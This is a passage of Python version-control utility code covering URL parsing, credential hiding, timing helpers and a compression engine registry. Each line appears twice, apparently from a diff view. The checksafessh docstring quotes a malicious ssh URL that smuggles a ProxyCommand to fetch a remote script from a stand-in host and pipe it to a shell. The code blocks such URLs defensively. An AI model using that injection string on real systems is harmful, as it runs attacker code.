2716 if parsefragment and '#' in path:
2716 if parsefragment and '#' in path:
2717 path, self.fragment = path.split('#', 1)
2717 path, self.fragment = path.split('#', 1)
2718
2718
2719 # special case for Windows drive letters and UNC paths
2719 # special case for Windows drive letters and UNC paths
2720 if hasdriveletter(path) or path.startswith('\\\\'):
2720 if hasdriveletter(path) or path.startswith('\\\\'):
2721 self.path = path
2721 self.path = path
2722 return
2722 return
2723
2723
2724 # For compatibility reasons, we can't handle bundle paths as
2724 # For compatibility reasons, we can't handle bundle paths as
2725 # normal URLS
2725 # normal URLS
2726 if path.startswith('bundle:'):
2726 if path.startswith('bundle:'):
2727 self.scheme = 'bundle'
2727 self.scheme = 'bundle'
2728 path = path[7:]
2728 path = path[7:]
2729 if path.startswith('//'):
2729 if path.startswith('//'):
2730 path = path[2:]
2730 path = path[2:]
2731 self.path = path
2731 self.path = path
2732 return
2732 return
2733
2733
2734 if self._matchscheme(path):
2734 if self._matchscheme(path):
2735 parts = path.split(':', 1)
2735 parts = path.split(':', 1)
2736 if parts[0]:
2736 if parts[0]:
2737 self.scheme, path = parts
2737 self.scheme, path = parts
2738 self._localpath = False
2738 self._localpath = False
2739
2739
2740 if not path:
2740 if not path:
2741 path = None
2741 path = None
2742 if self._localpath:
2742 if self._localpath:
2743 self.path = ''
2743 self.path = ''
2744 return
2744 return
2745 else:
2745 else:
2746 if self._localpath:
2746 if self._localpath:
2747 self.path = path
2747 self.path = path
2748 return
2748 return
2749
2749
2750 if parsequery and '?' in path:
2750 if parsequery and '?' in path:
2751 path, self.query = path.split('?', 1)
2751 path, self.query = path.split('?', 1)
2752 if not path:
2752 if not path:
2753 path = None
2753 path = None
2754 if not self.query:
2754 if not self.query:
2755 self.query = None
2755 self.query = None
2756
2756
2757 # // is required to specify a host/authority
2757 # // is required to specify a host/authority
2758 if path and path.startswith('//'):
2758 if path and path.startswith('//'):
2759 parts = path[2:].split('/', 1)
2759 parts = path[2:].split('/', 1)
2760 if len(parts) > 1:
2760 if len(parts) > 1:
2761 self.host, path = parts
2761 self.host, path = parts
2762 else:
2762 else:
2763 self.host = parts[0]
2763 self.host = parts[0]
2764 path = None
2764 path = None
2765 if not self.host:
2765 if not self.host:
2766 self.host = None
2766 self.host = None
2767 # path of file:///d is /d
2767 # path of file:///d is /d
2768 # path of file:///d:/ is d:/, not /d:/
2768 # path of file:///d:/ is d:/, not /d:/
2769 if path and not hasdriveletter(path):
2769 if path and not hasdriveletter(path):
2770 path = '/' + path
2770 path = '/' + path
2771
2771
2772 if self.host and '@' in self.host:
2772 if self.host and '@' in self.host:
2773 self.user, self.host = self.host.rsplit('@', 1)
2773 self.user, self.host = self.host.rsplit('@', 1)
2774 if ':' in self.user:
2774 if ':' in self.user:
2775 self.user, self.passwd = self.user.split(':', 1)
2775 self.user, self.passwd = self.user.split(':', 1)
2776 if not self.host:
2776 if not self.host:
2777 self.host = None
2777 self.host = None
2778
2778
2779 # Don't split on colons in IPv6 addresses without ports
2779 # Don't split on colons in IPv6 addresses without ports
2780 if (self.host and ':' in self.host and
2780 if (self.host and ':' in self.host and
2781 not (self.host.startswith('[') and self.host.endswith(']'))):
2781 not (self.host.startswith('[') and self.host.endswith(']'))):
2782 self._hostport = self.host
2782 self._hostport = self.host
2783 self.host, self.port = self.host.rsplit(':', 1)
2783 self.host, self.port = self.host.rsplit(':', 1)
2784 if not self.host:
2784 if not self.host:
2785 self.host = None
2785 self.host = None
2786
2786
2787 if (self.host and self.scheme == 'file' and
2787 if (self.host and self.scheme == 'file' and
2788 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2788 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2789 raise Abort(_('file:// URLs can only refer to localhost'))
2789 raise Abort(_('file:// URLs can only refer to localhost'))
2790
2790
2791 self.path = path
2791 self.path = path
2792
2792
2793 # leave the query string escaped
2793 # leave the query string escaped
2794 for a in ('user', 'passwd', 'host', 'port',
2794 for a in ('user', 'passwd', 'host', 'port',
2795 'path', 'fragment'):
2795 'path', 'fragment'):
2796 v = getattr(self, a)
2796 v = getattr(self, a)
2797 if v is not None:
2797 if v is not None:
2798 setattr(self, a, urlreq.unquote(v))
2798 setattr(self, a, urlreq.unquote(v))
2799
2799
2800 @encoding.strmethod
2800 @encoding.strmethod
2801 def __repr__(self):
2801 def __repr__(self):
2802 attrs = []
2802 attrs = []
2803 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2803 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2804 'query', 'fragment'):
2804 'query', 'fragment'):
2805 v = getattr(self, a)
2805 v = getattr(self, a)
2806 if v is not None:
2806 if v is not None:
2807 attrs.append('%s: %r' % (a, v))
2807 attrs.append('%s: %r' % (a, v))
2808 return '<url %s>' % ', '.join(attrs)
2808 return '<url %s>' % ', '.join(attrs)
2809
2809
2810 def __bytes__(self):
2810 def __bytes__(self):
2811 r"""Join the URL's components back into a URL string.
2811 r"""Join the URL's components back into a URL string.
2812
2812
2813 Examples:
2813 Examples:
2814
2814
2815 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2815 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2816 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2816 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2817 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2817 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2818 'http://user:pw@host:80/?foo=bar&baz=42'
2818 'http://user:pw@host:80/?foo=bar&baz=42'
2819 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2819 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2820 'http://user:pw@host:80/?foo=bar%3dbaz'
2820 'http://user:pw@host:80/?foo=bar%3dbaz'
2821 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2821 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2822 'ssh://user:pw@[::1]:2200//home/joe#'
2822 'ssh://user:pw@[::1]:2200//home/joe#'
2823 >>> bytes(url(b'http://localhost:80//'))
2823 >>> bytes(url(b'http://localhost:80//'))
2824 'http://localhost:80//'
2824 'http://localhost:80//'
2825 >>> bytes(url(b'http://localhost:80/'))
2825 >>> bytes(url(b'http://localhost:80/'))
2826 'http://localhost:80/'
2826 'http://localhost:80/'
2827 >>> bytes(url(b'http://localhost:80'))
2827 >>> bytes(url(b'http://localhost:80'))
2828 'http://localhost:80/'
2828 'http://localhost:80/'
2829 >>> bytes(url(b'bundle:foo'))
2829 >>> bytes(url(b'bundle:foo'))
2830 'bundle:foo'
2830 'bundle:foo'
2831 >>> bytes(url(b'bundle://../foo'))
2831 >>> bytes(url(b'bundle://../foo'))
2832 'bundle:../foo'
2832 'bundle:../foo'
2833 >>> bytes(url(b'path'))
2833 >>> bytes(url(b'path'))
2834 'path'
2834 'path'
2835 >>> bytes(url(b'file:///tmp/foo/bar'))
2835 >>> bytes(url(b'file:///tmp/foo/bar'))
2836 'file:///tmp/foo/bar'
2836 'file:///tmp/foo/bar'
2837 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2837 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2838 'file:///c:/tmp/foo/bar'
2838 'file:///c:/tmp/foo/bar'
2839 >>> print(url(br'bundle:foo\bar'))
2839 >>> print(url(br'bundle:foo\bar'))
2840 bundle:foo\bar
2840 bundle:foo\bar
2841 >>> print(url(br'file:///D:\data\hg'))
2841 >>> print(url(br'file:///D:\data\hg'))
2842 file:///D:\data\hg
2842 file:///D:\data\hg
2843 """
2843 """
2844 if self._localpath:
2844 if self._localpath:
2845 s = self.path
2845 s = self.path
2846 if self.scheme == 'bundle':
2846 if self.scheme == 'bundle':
2847 s = 'bundle:' + s
2847 s = 'bundle:' + s
2848 if self.fragment:
2848 if self.fragment:
2849 s += '#' + self.fragment
2849 s += '#' + self.fragment
2850 return s
2850 return s
2851
2851
2852 s = self.scheme + ':'
2852 s = self.scheme + ':'
2853 if self.user or self.passwd or self.host:
2853 if self.user or self.passwd or self.host:
2854 s += '//'
2854 s += '//'
2855 elif self.scheme and (not self.path or self.path.startswith('/')
2855 elif self.scheme and (not self.path or self.path.startswith('/')
2856 or hasdriveletter(self.path)):
2856 or hasdriveletter(self.path)):
2857 s += '//'
2857 s += '//'
2858 if hasdriveletter(self.path):
2858 if hasdriveletter(self.path):
2859 s += '/'
2859 s += '/'
2860 if self.user:
2860 if self.user:
2861 s += urlreq.quote(self.user, safe=self._safechars)
2861 s += urlreq.quote(self.user, safe=self._safechars)
2862 if self.passwd:
2862 if self.passwd:
2863 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2863 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2864 if self.user or self.passwd:
2864 if self.user or self.passwd:
2865 s += '@'
2865 s += '@'
2866 if self.host:
2866 if self.host:
2867 if not (self.host.startswith('[') and self.host.endswith(']')):
2867 if not (self.host.startswith('[') and self.host.endswith(']')):
2868 s += urlreq.quote(self.host)
2868 s += urlreq.quote(self.host)
2869 else:
2869 else:
2870 s += self.host
2870 s += self.host
2871 if self.port:
2871 if self.port:
2872 s += ':' + urlreq.quote(self.port)
2872 s += ':' + urlreq.quote(self.port)
2873 if self.host:
2873 if self.host:
2874 s += '/'
2874 s += '/'
2875 if self.path:
2875 if self.path:
2876 # TODO: similar to the query string, we should not unescape the
2876 # TODO: similar to the query string, we should not unescape the
2877 # path when we store it, the path might contain '%2f' = '/',
2877 # path when we store it, the path might contain '%2f' = '/',
2878 # which we should *not* escape.
2878 # which we should *not* escape.
2879 s += urlreq.quote(self.path, safe=self._safepchars)
2879 s += urlreq.quote(self.path, safe=self._safepchars)
2880 if self.query:
2880 if self.query:
2881 # we store the query in escaped form.
2881 # we store the query in escaped form.
2882 s += '?' + self.query
2882 s += '?' + self.query
2883 if self.fragment is not None:
2883 if self.fragment is not None:
2884 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2884 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2885 return s
2885 return s
2886
2886
2887 __str__ = encoding.strmethod(__bytes__)
2887 __str__ = encoding.strmethod(__bytes__)
2888
2888
2889 def authinfo(self):
2889 def authinfo(self):
2890 user, passwd = self.user, self.passwd
2890 user, passwd = self.user, self.passwd
2891 try:
2891 try:
2892 self.user, self.passwd = None, None
2892 self.user, self.passwd = None, None
2893 s = bytes(self)
2893 s = bytes(self)
2894 finally:
2894 finally:
2895 self.user, self.passwd = user, passwd
2895 self.user, self.passwd = user, passwd
2896 if not self.user:
2896 if not self.user:
2897 return (s, None)
2897 return (s, None)
2898 # authinfo[1] is passed to urllib2 password manager, and its
2898 # authinfo[1] is passed to urllib2 password manager, and its
2899 # URIs must not contain credentials. The host is passed in the
2899 # URIs must not contain credentials. The host is passed in the
2900 # URIs list because Python < 2.4.3 uses only that to search for
2900 # URIs list because Python < 2.4.3 uses only that to search for
2901 # a password.
2901 # a password.
2902 return (s, (None, (s, self.host),
2902 return (s, (None, (s, self.host),
2903 self.user, self.passwd or ''))
2903 self.user, self.passwd or ''))
2904
2904
2905 def isabs(self):
2905 def isabs(self):
2906 if self.scheme and self.scheme != 'file':
2906 if self.scheme and self.scheme != 'file':
2907 return True # remote URL
2907 return True # remote URL
2908 if hasdriveletter(self.path):
2908 if hasdriveletter(self.path):
2909 return True # absolute for our purposes - can't be joined()
2909 return True # absolute for our purposes - can't be joined()
2910 if self.path.startswith(br'\\'):
2910 if self.path.startswith(br'\\'):
2911 return True # Windows UNC path
2911 return True # Windows UNC path
2912 if self.path.startswith('/'):
2912 if self.path.startswith('/'):
2913 return True # POSIX-style
2913 return True # POSIX-style
2914 return False
2914 return False
2915
2915
2916 def localpath(self):
2916 def localpath(self):
2917 if self.scheme == 'file' or self.scheme == 'bundle':
2917 if self.scheme == 'file' or self.scheme == 'bundle':
2918 path = self.path or '/'
2918 path = self.path or '/'
2919 # For Windows, we need to promote hosts containing drive
2919 # For Windows, we need to promote hosts containing drive
2920 # letters to paths with drive letters.
2920 # letters to paths with drive letters.
2921 if hasdriveletter(self._hostport):
2921 if hasdriveletter(self._hostport):
2922 path = self._hostport + '/' + self.path
2922 path = self._hostport + '/' + self.path
2923 elif (self.host is not None and self.path
2923 elif (self.host is not None and self.path
2924 and not hasdriveletter(path)):
2924 and not hasdriveletter(path)):
2925 path = '/' + path
2925 path = '/' + path
2926 return path
2926 return path
2927 return self._origpath
2927 return self._origpath
2928
2928
2929 def islocal(self):
2929 def islocal(self):
2930 '''whether localpath will return something that posixfile can open'''
2930 '''whether localpath will return something that posixfile can open'''
2931 return (not self.scheme or self.scheme == 'file'
2931 return (not self.scheme or self.scheme == 'file'
2932 or self.scheme == 'bundle')
2932 or self.scheme == 'bundle')
2933
2933
2934 def hasscheme(path):
2934 def hasscheme(path):
2935 return bool(url(path).scheme)
2935 return bool(url(path).scheme)
2936
2936
2937 def hasdriveletter(path):
2937 def hasdriveletter(path):
2938 return path and path[1:2] == ':' and path[0:1].isalpha()
2938 return path and path[1:2] == ':' and path[0:1].isalpha()
2939
2939
2940 def urllocalpath(path):
2940 def urllocalpath(path):
2941 return url(path, parsequery=False, parsefragment=False).localpath()
2941 return url(path, parsequery=False, parsefragment=False).localpath()
2942
2942
2943 def checksafessh(path):
2943 def checksafessh(path):
2944 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2944 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2945
2945
2946 This is a sanity check for ssh urls. ssh will parse the first item as
2946 This is a sanity check for ssh urls. ssh will parse the first item as
2947 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2947 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2948 Let's prevent these potentially exploited urls entirely and warn the
2948 Let's prevent these potentially exploited urls entirely and warn the
2949 user.
2949 user.
2950
2950
2951 Raises an error.Abort when the url is unsafe.
2951 Raises an error.Abort when the url is unsafe.
2952 """
2952 """
2953 path = urlreq.unquote(path)
2953 path = urlreq.unquote(path)
2954 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2954 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2955 raise error.Abort(_('potentially unsafe url: %r') %
2955 raise error.Abort(_('potentially unsafe url: %r') %
2956 (path,))
2956 (path,))
2957
2957
2958 def hidepassword(u):
2958 def hidepassword(u):
2959 '''hide user credential in a url string'''
2959 '''hide user credential in a url string'''
2960 u = url(u)
2960 u = url(u)
2961 if u.passwd:
2961 if u.passwd:
2962 u.passwd = '***'
2962 u.passwd = '***'
2963 return bytes(u)
2963 return bytes(u)
2964
2964
2965 def removeauth(u):
2965 def removeauth(u):
2966 '''remove all authentication information from a url string'''
2966 '''remove all authentication information from a url string'''
2967 u = url(u)
2967 u = url(u)
2968 u.user = u.passwd = None
2968 u.user = u.passwd = None
2969 return str(u)
2969 return str(u)
2970
2970
2971 timecount = unitcountfn(
2971 timecount = unitcountfn(
2972 (1, 1e3, _('%.0f s')),
2972 (1, 1e3, _('%.0f s')),
2973 (100, 1, _('%.1f s')),
2973 (100, 1, _('%.1f s')),
2974 (10, 1, _('%.2f s')),
2974 (10, 1, _('%.2f s')),
2975 (1, 1, _('%.3f s')),
2975 (1, 1, _('%.3f s')),
2976 (100, 0.001, _('%.1f ms')),
2976 (100, 0.001, _('%.1f ms')),
2977 (10, 0.001, _('%.2f ms')),
2977 (10, 0.001, _('%.2f ms')),
2978 (1, 0.001, _('%.3f ms')),
2978 (1, 0.001, _('%.3f ms')),
2979 (100, 0.000001, _('%.1f us')),
2979 (100, 0.000001, _('%.1f us')),
2980 (10, 0.000001, _('%.2f us')),
2980 (10, 0.000001, _('%.2f us')),
2981 (1, 0.000001, _('%.3f us')),
2981 (1, 0.000001, _('%.3f us')),
2982 (100, 0.000000001, _('%.1f ns')),
2982 (100, 0.000000001, _('%.1f ns')),
2983 (10, 0.000000001, _('%.2f ns')),
2983 (10, 0.000000001, _('%.2f ns')),
2984 (1, 0.000000001, _('%.3f ns')),
2984 (1, 0.000000001, _('%.3f ns')),
2985 )
2985 )
2986
2986
2987 _timenesting = [0]
2987 _timenesting = [0]
2988
2988
2989 def timed(func):
2989 def timed(func):
2990 '''Report the execution time of a function call to stderr.
2990 '''Report the execution time of a function call to stderr.
2991
2991
2992 During development, use as a decorator when you need to measure
2992 During development, use as a decorator when you need to measure
2993 the cost of a function, e.g. as follows:
2993 the cost of a function, e.g. as follows:
2994
2994
2995 @util.timed
2995 @util.timed
2996 def foo(a, b, c):
2996 def foo(a, b, c):
2997 pass
2997 pass
2998 '''
2998 '''
2999
2999
3000 def wrapper(*args, **kwargs):
3000 def wrapper(*args, **kwargs):
3001 start = timer()
3001 start = timer()
3002 indent = 2
3002 indent = 2
3003 _timenesting[0] += indent
3003 _timenesting[0] += indent
3004 try:
3004 try:
3005 return func(*args, **kwargs)
3005 return func(*args, **kwargs)
3006 finally:
3006 finally:
3007 elapsed = timer() - start
3007 elapsed = timer() - start
3008 _timenesting[0] -= indent
3008 _timenesting[0] -= indent
3009 stderr.write('%s%s: %s\n' %
3009 stderr.write('%s%s: %s\n' %
3010 (' ' * _timenesting[0], func.__name__,
3010 (' ' * _timenesting[0], func.__name__,
3011 timecount(elapsed)))
3011 timecount(elapsed)))
3012 return wrapper
3012 return wrapper
3013
3013
3014 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3014 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3015 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3015 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3016
3016
3017 def sizetoint(s):
3017 def sizetoint(s):
3018 '''Convert a space specifier to a byte count.
3018 '''Convert a space specifier to a byte count.
3019
3019
3020 >>> sizetoint(b'30')
3020 >>> sizetoint(b'30')
3021 30
3021 30
3022 >>> sizetoint(b'2.2kb')
3022 >>> sizetoint(b'2.2kb')
3023 2252
3023 2252
3024 >>> sizetoint(b'6M')
3024 >>> sizetoint(b'6M')
3025 6291456
3025 6291456
3026 '''
3026 '''
3027 t = s.strip().lower()
3027 t = s.strip().lower()
3028 try:
3028 try:
3029 for k, u in _sizeunits:
3029 for k, u in _sizeunits:
3030 if t.endswith(k):
3030 if t.endswith(k):
3031 return int(float(t[:-len(k)]) * u)
3031 return int(float(t[:-len(k)]) * u)
3032 return int(t)
3032 return int(t)
3033 except ValueError:
3033 except ValueError:
3034 raise error.ParseError(_("couldn't parse size: %s") % s)
3034 raise error.ParseError(_("couldn't parse size: %s") % s)
3035
3035
3036 class hooks(object):
3036 class hooks(object):
3037 '''A collection of hook functions that can be used to extend a
3037 '''A collection of hook functions that can be used to extend a
3038 function's behavior. Hooks are called in lexicographic order,
3038 function's behavior. Hooks are called in lexicographic order,
3039 based on the names of their sources.'''
3039 based on the names of their sources.'''
3040
3040
3041 def __init__(self):
3041 def __init__(self):
3042 self._hooks = []
3042 self._hooks = []
3043
3043
3044 def add(self, source, hook):
3044 def add(self, source, hook):
3045 self._hooks.append((source, hook))
3045 self._hooks.append((source, hook))
3046
3046
3047 def __call__(self, *args):
3047 def __call__(self, *args):
3048 self._hooks.sort(key=lambda x: x[0])
3048 self._hooks.sort(key=lambda x: x[0])
3049 results = []
3049 results = []
3050 for source, hook in self._hooks:
3050 for source, hook in self._hooks:
3051 results.append(hook(*args))
3051 results.append(hook(*args))
3052 return results
3052 return results
3053
3053
3054 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3054 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3055 '''Yields lines for a nicely formatted stacktrace.
3055 '''Yields lines for a nicely formatted stacktrace.
3056 Skips the 'skip' last entries, then return the last 'depth' entries.
3056 Skips the 'skip' last entries, then return the last 'depth' entries.
3057 Each file+linenumber is formatted according to fileline.
3057 Each file+linenumber is formatted according to fileline.
3058 Each line is formatted according to line.
3058 Each line is formatted according to line.
3059 If line is None, it yields:
3059 If line is None, it yields:
3060 length of longest filepath+line number,
3060 length of longest filepath+line number,
3061 filepath+linenumber,
3061 filepath+linenumber,
3062 function
3062 function
3063
3063
3064 Not be used in production code but very convenient while developing.
3064 Not be used in production code but very convenient while developing.
3065 '''
3065 '''
3066 entries = [(fileline % (fn, ln), func)
3066 entries = [(fileline % (fn, ln), func)
3067 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3067 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3068 ][-depth:]
3068 ][-depth:]
3069 if entries:
3069 if entries:
3070 fnmax = max(len(entry[0]) for entry in entries)
3070 fnmax = max(len(entry[0]) for entry in entries)
3071 for fnln, func in entries:
3071 for fnln, func in entries:
3072 if line is None:
3072 if line is None:
3073 yield (fnmax, fnln, func)
3073 yield (fnmax, fnln, func)
3074 else:
3074 else:
3075 yield line % (fnmax, fnln, func)
3075 yield line % (fnmax, fnln, func)
3076
3076
3077 def debugstacktrace(msg='stacktrace', skip=0,
3077 def debugstacktrace(msg='stacktrace', skip=0,
3078 f=stderr, otherf=stdout, depth=0):
3078 f=stderr, otherf=stdout, depth=0):
3079 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3079 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3080 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3080 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3081 By default it will flush stdout first.
3081 By default it will flush stdout first.
3082 It can be used everywhere and intentionally does not require an ui object.
3082 It can be used everywhere and intentionally does not require an ui object.
3083 Not be used in production code but very convenient while developing.
3083 Not be used in production code but very convenient while developing.
3084 '''
3084 '''
3085 if otherf:
3085 if otherf:
3086 otherf.flush()
3086 otherf.flush()
3087 f.write('%s at:\n' % msg.rstrip())
3087 f.write('%s at:\n' % msg.rstrip())
3088 for line in getstackframes(skip + 1, depth=depth):
3088 for line in getstackframes(skip + 1, depth=depth):
3089 f.write(line)
3089 f.write(line)
3090 f.flush()
3090 f.flush()
3091
3091
3092 class dirs(object):
3092 class dirs(object):
3093 '''a multiset of directory names from a dirstate or manifest'''
3093 '''a multiset of directory names from a dirstate or manifest'''
3094
3094
3095 def __init__(self, map, skip=None):
3095 def __init__(self, map, skip=None):
3096 self._dirs = {}
3096 self._dirs = {}
3097 addpath = self.addpath
3097 addpath = self.addpath
3098 if safehasattr(map, 'iteritems') and skip is not None:
3098 if safehasattr(map, 'iteritems') and skip is not None:
3099 for f, s in map.iteritems():
3099 for f, s in map.iteritems():
3100 if s[0] != skip:
3100 if s[0] != skip:
3101 addpath(f)
3101 addpath(f)
3102 else:
3102 else:
3103 for f in map:
3103 for f in map:
3104 addpath(f)
3104 addpath(f)
3105
3105
3106 def addpath(self, path):
3106 def addpath(self, path):
3107 dirs = self._dirs
3107 dirs = self._dirs
3108 for base in finddirs(path):
3108 for base in finddirs(path):
3109 if base in dirs:
3109 if base in dirs:
3110 dirs[base] += 1
3110 dirs[base] += 1
3111 return
3111 return
3112 dirs[base] = 1
3112 dirs[base] = 1
3113
3113
3114 def delpath(self, path):
3114 def delpath(self, path):
3115 dirs = self._dirs
3115 dirs = self._dirs
3116 for base in finddirs(path):
3116 for base in finddirs(path):
3117 if dirs[base] > 1:
3117 if dirs[base] > 1:
3118 dirs[base] -= 1
3118 dirs[base] -= 1
3119 return
3119 return
3120 del dirs[base]
3120 del dirs[base]
3121
3121
3122 def __iter__(self):
3122 def __iter__(self):
3123 return iter(self._dirs)
3123 return iter(self._dirs)
3124
3124
3125 def __contains__(self, d):
3125 def __contains__(self, d):
3126 return d in self._dirs
3126 return d in self._dirs
3127
3127
3128 if safehasattr(parsers, 'dirs'):
3128 if safehasattr(parsers, 'dirs'):
3129 dirs = parsers.dirs
3129 dirs = parsers.dirs
3130
3130
3131 def finddirs(path):
3131 def finddirs(path):
3132 pos = path.rfind('/')
3132 pos = path.rfind('/')
3133 while pos != -1:
3133 while pos != -1:
3134 yield path[:pos]
3134 yield path[:pos]
3135 pos = path.rfind('/', 0, pos)
3135 pos = path.rfind('/', 0, pos)
3136
3136
3137 # compression code
3137 # compression code
3138
3138
3139 SERVERROLE = 'server'
3139 SERVERROLE = 'server'
3140 CLIENTROLE = 'client'
3140 CLIENTROLE = 'client'
3141
3141
3142 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3142 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3143 (u'name', u'serverpriority',
3143 (u'name', u'serverpriority',
3144 u'clientpriority'))
3144 u'clientpriority'))
3145
3145
3146 class compressormanager(object):
3146 class compressormanager(object):
3147 """Holds registrations of various compression engines.
3147 """Holds registrations of various compression engines.
3148
3148
3149 This class essentially abstracts the differences between compression
3149 This class essentially abstracts the differences between compression
3150 engines to allow new compression formats to be added easily, possibly from
3150 engines to allow new compression formats to be added easily, possibly from
3151 extensions.
3151 extensions.
3152
3152
3153 Compressors are registered against the global instance by calling its
3153 Compressors are registered against the global instance by calling its
3154 ``register()`` method.
3154 ``register()`` method.
3155 """
3155 """
3156 def __init__(self):
3156 def __init__(self):
3157 self._engines = {}
3157 self._engines = {}
3158 # Bundle spec human name to engine name.
3158 # Bundle spec human name to engine name.
3159 self._bundlenames = {}
3159 self._bundlenames = {}
3160 # Internal bundle identifier to engine name.
3160 # Internal bundle identifier to engine name.
3161 self._bundletypes = {}
3161 self._bundletypes = {}
3162 # Revlog header to engine name.
3162 # Revlog header to engine name.
3163 self._revlogheaders = {}
3163 self._revlogheaders = {}
3164 # Wire proto identifier to engine name.
3164 # Wire proto identifier to engine name.
3165 self._wiretypes = {}
3165 self._wiretypes = {}
3166
3166
3167 def __getitem__(self, key):
3167 def __getitem__(self, key):
3168 return self._engines[key]
3168 return self._engines[key]
3169
3169
3170 def __contains__(self, key):
3170 def __contains__(self, key):
3171 return key in self._engines
3171 return key in self._engines
3172
3172
3173 def __iter__(self):
3173 def __iter__(self):
3174 return iter(self._engines.keys())
3174 return iter(self._engines.keys())
3175
3175
3176 def register(self, engine):
3176 def register(self, engine):
3177 """Register a compression engine with the manager.
3177 """Register a compression engine with the manager.
3178
3178
3179 The argument must be a ``compressionengine`` instance.
3179 The argument must be a ``compressionengine`` instance.
3180 """
3180 """
3181 if not isinstance(engine, compressionengine):
3181 if not isinstance(engine, compressionengine):
3182 raise ValueError(_('argument must be a compressionengine'))
3182 raise ValueError(_('argument must be a compressionengine'))
3183
3183
3184 name = engine.name()
3184 name = engine.name()
3185
3185
3186 if name in self._engines:
3186 if name in self._engines:
3187 raise error.Abort(_('compression engine %s already registered') %
3187 raise error.Abort(_('compression engine %s already registered') %
3188 name)
3188 name)
3189
3189
3190 bundleinfo = engine.bundletype()
3190 bundleinfo = engine.bundletype()
3191 if bundleinfo:
3191 if bundleinfo:
3192 bundlename, bundletype = bundleinfo
3192 bundlename, bundletype = bundleinfo
3193
3193
3194 if bundlename in self._bundlenames:
3194 if bundlename in self._bundlenames:
3195 raise error.Abort(_('bundle name %s already registered') %
3195 raise error.Abort(_('bundle name %s already registered') %
3196 bundlename)
3196 bundlename)
3197 if bundletype in self._bundletypes:
3197 if bundletype in self._bundletypes:
3198 raise error.Abort(_('bundle type %s already registered by %s') %
3198 raise error.Abort(_('bundle type %s already registered by %s') %
3199 (bundletype, self._bundletypes[bundletype]))
3199 (bundletype, self._bundletypes[bundletype]))
3200
3200
3201 # No external facing name declared.
3201 # No external facing name declared.
3202 if bundlename:
3202 if bundlename:
3203 self._bundlenames[bundlename] = name
3203 self._bundlenames[bundlename] = name
3204
3204
3205 self._bundletypes[bundletype] = name
3205 self._bundletypes[bundletype] = name
3206
3206
3207 wiresupport = engine.wireprotosupport()
3207 wiresupport = engine.wireprotosupport()
3208 if wiresupport:
3208 if wiresupport:
3209 wiretype = wiresupport.name
3209 wiretype = wiresupport.name
3210 if wiretype in self._wiretypes:
3210 if wiretype in self._wiretypes:
3211 raise error.Abort(_('wire protocol compression %s already '
3211 raise error.Abort(_('wire protocol compression %s already '
3212 'registered by %s') %
3212 'registered by %s') %
3213 (wiretype, self._wiretypes[wiretype]))
3213 (wiretype, self._wiretypes[wiretype]))
3214
3214
3215 self._wiretypes[wiretype] = name
3215 self._wiretypes[wiretype] = name
3216
3216
3217 revlogheader = engine.revlogheader()
3217 revlogheader = engine.revlogheader()
3218 if revlogheader and revlogheader in self._revlogheaders:
3218 if revlogheader and revlogheader in self._revlogheaders:
3219 raise error.Abort(_('revlog header %s already registered by %s') %
3219 raise error.Abort(_('revlog header %s already registered by %s') %
3220 (revlogheader, self._revlogheaders[revlogheader]))
3220 (revlogheader, self._revlogheaders[revlogheader]))
3221
3221
3222 if revlogheader:
3222 if revlogheader:
3223 self._revlogheaders[revlogheader] = name
3223 self._revlogheaders[revlogheader] = name
3224
3224
3225 self._engines[name] = engine
3225 self._engines[name] = engine
3226
3226
3227 @property
3227 @property
3228 def supportedbundlenames(self):
3228 def supportedbundlenames(self):
3229 return set(self._bundlenames.keys())
3229 return set(self._bundlenames.keys())
3230
3230
3231 @property
3231 @property
3232 def supportedbundletypes(self):
3232 def supportedbundletypes(self):
3233 return set(self._bundletypes.keys())
3233 return set(self._bundletypes.keys())
3234
3234
3235 def forbundlename(self, bundlename):
3235 def forbundlename(self, bundlename):
3236 """Obtain a compression engine registered to a bundle name.
3236 """Obtain a compression engine registered to a bundle name.
3237
3237
3238 Will raise KeyError if the bundle type isn't registered.
3238 Will raise KeyError if the bundle type isn't registered.
3239
3239
3240 Will abort if the engine is known but not available.
3240 Will abort if the engine is known but not available.
